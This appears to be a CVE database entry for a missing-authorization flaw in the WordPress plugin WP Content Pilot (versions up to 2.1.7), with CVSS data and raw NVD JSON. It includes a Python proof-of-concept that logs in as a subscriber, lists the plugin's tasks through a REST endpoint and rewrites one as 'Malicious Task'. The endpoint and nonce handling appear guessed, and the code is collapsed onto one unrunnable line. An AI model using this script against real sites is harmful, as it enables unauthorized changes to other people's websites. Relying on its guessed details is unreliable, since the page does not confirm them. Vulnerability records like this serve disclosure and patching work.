Security Vulnerability Report
中文
CVE-2025-64263 CVSS 5.4 MEDIUM

CVE-2025-64263

Published: 2025-11-13 10:15:52
Last Modified: 2026-04-27 16:16:39

Description

Missing Authorization vulnerability in PluginEver WP Content Pilot wp-content-pilot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Content Pilot: from n/a through <= 2.1.7.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Content Pilot <= 2.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-64263 PoC - WP Content Pilot Missing Authorization # Target: WordPress site with WP Content Pilot plugin <= 2.1.7 TARGET_URL = "https://vulnerable-site.com" USERNAME = "subscriber_user" PASSWORD = "user_password" def get_auth_token(): """Get WordPress authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' in str(response.cookies): return session.cookies.get_dict() return None def exploit_missing_auth(): """Exploit CVE-2025-64263: Missing Authorization in WP Content Pilot""" cookies = get_auth_token() if not cookies: print("[-] Authentication failed") return # Enumerate content pilot tasks (requires admin privileges normally) tasks_endpoint = f"{TARGET_URL}/wp-json/wp-content-pilot/v1/tasks" headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': '' # May be missing or bypassable } # Try to list all tasks with low-privilege account response = requests.get( tasks_endpoint, cookies=cookies, headers=headers ) if response.status_code == 200: print("[+] Exploit successful! Retrieved task list without proper authorization") print(f"[+] Response: {json.dumps(response.json(), indent=2)}") # Try to modify a task (requires admin privileges) modify_endpoint = f"{TARGET_URL}/wp-json/wp-content-pilot/v1/tasks/1" modify_data = { 'name': 'Malicious Task', 'status': 'active' } modify_response = requests.patch( modify_endpoint, cookies=cookies, headers=headers, json=modify_data ) if modify_response.status_code in [200, 201]: print("[+] Successfully modified task configuration") else: print(f"[-] Request failed with status: {response.status_code}") if __name__ == "__main__": print("CVE-2025-64263 WP Content Pilot Missing Authorization PoC") exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64263", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:51.620", "lastModified": "2026-04-27T16:16:38.773", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PluginEver WP Content Pilot wp-content-pilot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Content Pilot: from n/a through <= 2.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-content-pilot/vulnerability/wordpress-wp-content-pilot-plugin-2-1-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}